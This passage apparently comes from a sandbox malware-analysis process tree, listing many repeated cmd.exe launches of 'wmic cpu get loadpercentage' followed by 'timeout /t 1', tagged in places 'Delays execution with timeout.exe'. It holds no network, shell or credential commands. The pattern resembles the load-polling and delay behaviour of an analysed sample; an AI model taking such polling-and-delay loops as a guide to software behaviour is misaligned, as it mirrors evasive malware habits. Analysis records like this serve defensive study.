- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:60
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3860
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:8
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:68
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:68
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4672
